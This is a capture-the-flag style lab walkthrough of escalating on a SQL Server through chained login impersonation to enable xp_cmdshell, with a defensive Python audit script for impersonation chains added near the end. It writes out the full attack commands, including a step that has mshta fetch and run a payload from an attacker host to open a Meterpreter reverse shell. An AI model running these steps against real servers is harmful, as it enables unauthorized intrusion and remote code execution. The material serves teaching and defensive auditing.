Exploiting MSSQL Impersonation and xp_cmdshell to Gain Remote Access
When it comes to real-world exploitation, SQL Server misconfigurations can sometimes give you a direct pathway from a low-privileged database user all the way to system-level code execution. In this post, we’ll walk through a full MSSQL attack chain involving privilege escalation through user impersonation and abuse of xp_cmdshell to gain a Meterpreter session.
Let’s break it all down, step by step.
Objective
Gain code execution on the target MSSQL server by escalating from a low-privileged SQL user to sa, enabling xp_cmdshell, and delivering a payload using a malicious HTA server.
Step 1: Confirm Connectivity
Start by checking if the target is reachable.
ping -c 4 demo.ine.local
# Sends 4 ICMP packets to test connectivity with the target
Step 2: Scan the Target with Nmap
Scan the target for open ports and discover services.
nmap demo.ine.local
# Quick scan to identify open TCP ports
MSSQL is typically found on port 1433, and we can confirm it’s open.
Step 3: Discover MSSQL Info
Use the ms-sql-info script to pull information about the database version and configuration.
nmap --script ms-sql-info -p 1433 demo.ine.local
# Gathers detailed MSSQL server information
Discovered: Microsoft SQL Server 2019
Step 4: Connect to MSSQL Server
Use mssqlclient.py from Impacket to authenticate with the supplied credentials.
python3 mssqlclient.py bob:KhyUuxwp7Mcxo7@demo.ine.local
# Connects to MSSQL with provided credentials
Connection successful.
Step 5: Check Version Info
Once inside, we can confirm the SQL Server and OS version.
select @@version;
# Displays MSSQL server and Windows OS details
Step 6: Check sysadmin Role
We want to see who has full administrative control over SQL Server.
select loginname from syslogins where sysadmin = 1;
# Lists accounts with sysadmin privileges
Only the sa account has sysadmin rights.
Step 7: Attempt to Enable xp_cmdshell
xp_cmdshell allows execution of Windows commands from SQL.
enable_xp_cmdshell
# Attempts to enable xp_cmdshell
Result: Access denied — the bob user lacks permissions.
Step 8: Search for Impersonation Privileges
Now we check if bob can impersonate another user.
SELECT DISTINCT b.name
FROM sys.server_permissions a
INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id
WHERE a.permission_name = 'IMPERSONATE';
# Lists the logins on which IMPERSONATE has been granted, i.e. who can be impersonated
Output: sa and dbuser can be impersonated.
Step 9: Try Impersonating sa
Let’s try going straight for gold.
SELECT SYSTEM_USER;
EXECUTE AS LOGIN = 'sa';
Denied. bob cannot impersonate sa directly.
Step 10: Impersonate dbuser
We try a lateral privilege move.
SELECT SYSTEM_USER;
EXECUTE AS LOGIN = 'dbuser';
SELECT SYSTEM_USER;
# dbuser impersonation succeeded
Success — we are now running as dbuser.
Step 11: From dbuser to sa
Now that we’ve moved to dbuser, try impersonating sa.
SELECT SYSTEM_USER;
EXECUTE AS LOGIN = 'sa';
SELECT SYSTEM_USER;
# Successfully impersonated sa
Boom. We’ve escalated to sa — the SQL admin.
Step 12: Enable xp_cmdshell (Again)
Now with sa privileges:
enable_xp_cmdshell
# Should now work — and it does
We now have the ability to run OS commands from SQL.
Step 13: Run Command on Host
Let’s confirm code execution:
EXEC xp_cmdshell 'whoami';
# Should return the user running the SQL service
Output: nt service\mssql$sqlexpress
Step 14: Set Up Malicious HTA Server
Now we deliver a payload using Metasploit’s HTA module:
msfconsole -q
use exploit/windows/misc/hta_server
exploit
# This hosts a malicious HTA file that spawns a reverse shell
Step 15: Trigger the Payload via xp_cmdshell
In the MSSQL shell:
EXEC xp_cmdshell 'mshta.exe http://<attacker-ip>:8080/yourpayload.hta';
# Reaches out to attacker and pulls the malicious script
Success — we catch a Meterpreter session.
Step 16: Interact with Meterpreter
Back in Metasploit:
sessions
sessions -i 1
sysinfo
getuid
# Confirms system information and current user
Step 17: Grab the Flag
cat C:\\flag.txt
# Reads the flag file on the target machine
Flag: c5b7da8ca7d051749cd5d3e1e741ef91
Summary of the Attack Chain
This is a classic case of misconfigured user impersonation:
bob → can impersonate → dbuser
dbuser → can impersonate → sa
sa → can enable → xp_cmdshell → remote code execution
Ultimately, a low-privileged database user (bob) was able to escalate to full system command execution through a misconfigured impersonation chain and then deliver a payload for a full shell.
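As an added, defender-side example that is not part of the original write-up, the Python below turns the IMPERSONATE grants into a graph and reports every login that can reach a sysadmin through one or more EXECUTE AS LOGIN hops, which is the bob to dbuser to sa chain above generalised to any depth. The T-SQL export query and the sample rows are my own assumptions; the login names only mirror the lab.

```python
"""Audit transitive IMPERSONATE chains between SQL Server logins."""
from collections import deque

# Assumed audit query (not from the write-up). It uses the documented
# sys.server_permissions columns: class 101 = SERVER_PRINCIPAL securable,
# major_id = the login being impersonated, grantee = who may impersonate it.
EDGE_QUERY = """
SELECT grantee.name AS grantee, target.name AS target,
       IS_SRVROLEMEMBER('sysadmin', target.name) AS target_is_sysadmin
FROM sys.server_permissions p
JOIN sys.server_principals grantee ON p.grantee_principal_id = grantee.principal_id
JOIN sys.server_principals target  ON p.major_id = target.principal_id
WHERE p.class = 101 AND p.permission_name = 'IMPERSONATE' AND p.state IN ('G', 'W');
"""
# Constructed rows in the shape EDGE_QUERY returns: the lab chain
# bob -> dbuser -> sa, plus one extra login that shares dbuser's grant.
SAMPLE_EDGES = [
    ("bob", "dbuser", 0),
    ("dbuser", "sa", 1),
    ("reporting", "dbuser", 0),
]

def build_graph(edges):
    """Adjacency map grantee -> {targets}, plus the set of sysadmin logins."""
    graph, sysadmins = {}, set()
    for grantee, target, is_sysadmin in edges:
        graph.setdefault(grantee, set()).add(target)
        graph.setdefault(target, set())
        if is_sysadmin:
            sysadmins.add(target)
    return graph, sysadmins

def paths_to_sysadmin(edges):
    """Return {login: shortest chain of EXECUTE AS LOGIN hops} for every
    non-sysadmin login that can reach a sysadmin, directly or transitively."""
    graph, sysadmins = build_graph(edges)
    findings = {}
    for start in sorted(graph):
        if start in sysadmins:
            continue
        queue, seen = deque([[start]]), {start}
        while queue:
            path = queue.popleft()
            if path[-1] in sysadmins:
                findings[start] = path
                break
            for nxt in sorted(graph[path[-1]] - seen):
                seen.add(nxt)
                queue.append(path + [nxt])
    return findings
```

Any login the function reports is a sysadmin in all but name; revoke the grant or break the chain at the hop that leads to the sysadmin.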
Key Takeaways for Pentesters
- Always check for impersonation rights with sys.server_permissions
- Privilege escalation doesn't always rely on weak passwords; misconfigurations can be gold
- xp_cmdshell can be your gateway to full system compromise
- SQL Server often runs with high privileges on Windows; abuse that carefully
